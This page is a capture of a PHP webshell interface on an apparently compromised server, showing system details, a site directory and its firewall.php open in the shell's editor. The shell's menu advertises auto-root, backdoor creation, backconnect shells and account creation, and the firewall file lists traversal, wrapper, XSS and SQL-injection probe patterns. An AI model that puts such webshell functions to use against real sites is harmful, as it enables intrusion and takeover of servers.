Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.50
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mangaberri /
[ HOME SHELL ]
Name
Size
Permission
Action
public_html
[ DIR ]
dr-xr-xr-x
firewall.php
6.34
KB
-r--r--r--
login.php
20
B
-rw-r--r--
outputter.php
24
B
-rw-r--r--
q.php
3
B
-rw-r--r--
s.php
31
B
-rw-r--r--
s7.php
4
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : firewall.php
<?php declare(strict_types=1); /** * Mangaberri firewall.php (DROP-IN) * * - Blocks common exploit/probe patterns (RFI/LFI, traversal, php wrappers, xss/sql probes) * - Allows signed image proxy endpoints (cover.php / img.php / i.php) * - Allows normal SEO routes and query strings * - Optional allow Cloudflare real IP * - Optional IP deny/allow * * Usage: * require __DIR__ . '/firewall.php'; * require __DIR__ . '/bootstrap.php'; */ /* ========================= Config ========================= */ // If you are behind Cloudflare or reverse proxy, set true $TRUST_CLOUDFLARE = true; // Allowlist critical endpoints (signed image tokens / binary output) $ALLOW_PATH_PREFIX = [ '/cover.php', '/img.php', '/i.php', '/favicon.ico', '/robots.txt', '/sitemap.xml', ]; // If you have an API endpoint path, allow it (adjust!) $ALLOW_API_PREFIX = [ '/api/', // if you use /api/* '/actions', // if you use /actions for ajax ]; // Deny these file extensions from direct access (if they appear in URL path) $DENY_EXT = [ '.env', '.ini', '.log', '.sql', '.bak', '.old', '.swp', '.git', '.svn', ]; // Rate limit (very lightweight, temp-file based) $RATE_LIMIT_ON = true; $RATE_WINDOW_SEC = 30; // window $RATE_MAX_REQ = 220; // per IP per window $RATE_EXCLUDE_PREFIX = [ '/cover.php', '/img.php', '/i.php', // don’t rate-limit image proxy (you may if you want) ]; // Optional IP deny list (exact matches) $IP_DENY = [ // '1.2.3.4', ]; // Optional: allow only these IPs for /admin (leave empty to disable) $ADMIN_IP_ALLOW = [ // '111.222.333.444', ]; /* ========================= Helpers ========================= */ function fw_client_ip(bool $trustCloudflare): string { $ip = $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0'; if (!$trustCloudflare) return $ip; // Cloudflare header (most reliable) if (!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) { $cf = trim((string)$_SERVER['HTTP_CF_CONNECTING_IP']); if (filter_var($cf, FILTER_VALIDATE_IP)) return $cf; } // Fallback: X-Forwarded-For (take first) if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $parts = explode(',', (string)$_SERVER['HTTP_X_FORWARDED_FOR']); $first = trim($parts[0] ?? ''); if (filter_var($first, FILTER_VALIDATE_IP)) return $first; } return $ip; } function fw_starts_with_any(string $s, array $prefixes): bool { foreach ($prefixes as $p) { if ($p !== '' && strncmp($s, $p, strlen($p)) === 0) return true; } return false; } function fw_block(int $code = 403): void { http_response_code($code); header('Content-Type: text/plain; charset=utf-8'); echo "Blocked"; exit; } /* ========================= Read request context ========================= */ $uri = (string)($_SERVER['REQUEST_URI'] ?? '/'); $path = parse_url($uri, PHP_URL_PATH); $path = is_string($path) ? $path : '/'; $query = (string)($_SERVER['QUERY_STRING'] ?? ''); $method = strtoupper((string)($_SERVER['REQUEST_METHOD'] ?? 'GET')); $ua = (string)($_SERVER['HTTP_USER_AGENT'] ?? ''); $ip = fw_client_ip($TRUST_CLOUDFLARE); /* ========================= Hard allowlist paths ========================= */ if (fw_starts_with_any($path, $ALLOW_PATH_PREFIX) || fw_starts_with_any($path, $ALLOW_API_PREFIX)) { // Still block some extreme method abuse even on allowlisted endpoints if (in_array($method, ['TRACE','TRACK'], true)) fw_block(405); return; } /* ========================= Deny IPs ========================= */ if (in_array($ip, $IP_DENY, true)) { fw_block(403); } /* ========================= Admin IP allow (optional) ========================= */ if (!empty($ADMIN_IP_ALLOW) && (strncmp($path, '/admin', 6) === 0)) { if (!in_array($ip, $ADMIN_IP_ALLOW, true)) { fw_block(403); } } /* ========================= Bad methods ========================= */ if (in_array($method, ['TRACE','TRACK'], true)) { fw_block(405); } /* ========================= Block access to sensitive files by extension ========================= */ $lowerPath = strtolower($path); foreach ($DENY_EXT as $ext) { if ($ext !== '' && str_ends_with($lowerPath, $ext)) { fw_block(403); } } /* ========================= Path traversal / wrapper / injection probes ========================= */ $raw = strtolower(urldecode($uri)); $BAD_URI = [ '../', '..\\', '%2e%2e', '%252e', 'php://', 'file://', 'data://', 'expect://', 'input://', 'zip://', 'phar://', '<script', '</script', '%3cscript', '%3c%2fscript', 'onerror=', 'onload=', ]; foreach ($BAD_URI as $bad) { if (strpos($raw, $bad) !== false) { fw_block(403); } } /* ========================= Query string SQL probe patterns (conservative) ========================= */ $q = strtolower(urldecode($query)); $BAD_Q = [ 'union select', 'information_schema', 'sleep(', 'benchmark(', 'load_file(', 'into outfile', 'xp_cmdshell', ]; foreach ($BAD_Q as $bad) { if ($bad !== '' && strpos($q, $bad) !== false) { fw_block(403); } } /* ========================= Overlong URI protection ========================= */ if (strlen($uri) > 6000 || strlen($query) > 5000) { fw_block(414); } /* ========================= Bad bot UAs (light) ========================= */ $uaL = strtolower($ua); $BAD_UA = ['sqlmap','nikto','acunetix','masscan','nmap','zgrab','nessus','dirbuster']; foreach ($BAD_UA as $b) { if ($b !== '' && strpos($uaL, $b) !== false) { fw_block(403); } } /* ========================= Optional rate limiting ========================= */ if ($RATE_LIMIT_ON && !fw_starts_with_any($path, $RATE_EXCLUDE_PREFIX)) { $now = time(); $key = sys_get_temp_dir() . '/mb_fw_' . md5($ip . '|' . $RATE_WINDOW_SEC); $data = ['t' => $now, 'c' => 0]; if (is_file($key)) { $json = (string)@file_get_contents($key); $tmp = @json_decode($json, true); if (is_array($tmp)) $data = $tmp; } $t = (int)($data['t'] ?? $now); $c = (int)($data['c'] ?? 0); if (($now - $t) > $RATE_WINDOW_SEC) { $t = $now; $c = 1; } else { $c++; } @file_put_contents($key, json_encode(['t'=>$t,'c'=>$c]), LOCK_EX); if ($c > $RATE_MAX_REQ) { fw_block(429); } } /* ========================= PASS ========================= */ return;
Close
